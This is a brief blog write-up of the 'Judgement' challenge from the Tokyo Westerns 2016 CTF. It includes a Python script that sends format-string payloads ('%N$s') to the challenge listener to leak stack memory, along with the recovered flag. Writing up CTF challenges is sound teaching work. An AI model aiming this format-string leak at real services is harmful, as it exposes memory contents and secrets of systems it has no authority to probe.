Kebechet!


a collection of stuff, thangs.....

Fuzzing simple listeners

Posted: 2016-09-05 17:26:16 (ohai)
Tokyo Westerns 2016 was this past weekend and one of the challenges (Judgement) had you connect to a remote listener and send it something. It was vuln to string format so we could leak the stack. Printing the stack:
#!/usr/bin/env python

import socket

for i in range(50):
  csock = socket.socket()
  csock.connect(('pwn1.chal.ctf.westerns.tokyo', 31729))
  csock.send("%" + str(i) + "$s" + "\n")
  x = csock.recv(1024)
  if 'TWCTF' in x:
    print x
    break
After a bit, we are rewarded with
Input flag >> TWCTF{R3:l1f3_1n_4_pwn_w0rld_fr0m_z3r0}

Post Tagged with:
CTF, Python, Sockets


   Allowed tags: [code][/code], [b][/b], [i][/i], [u][/u]
Comments: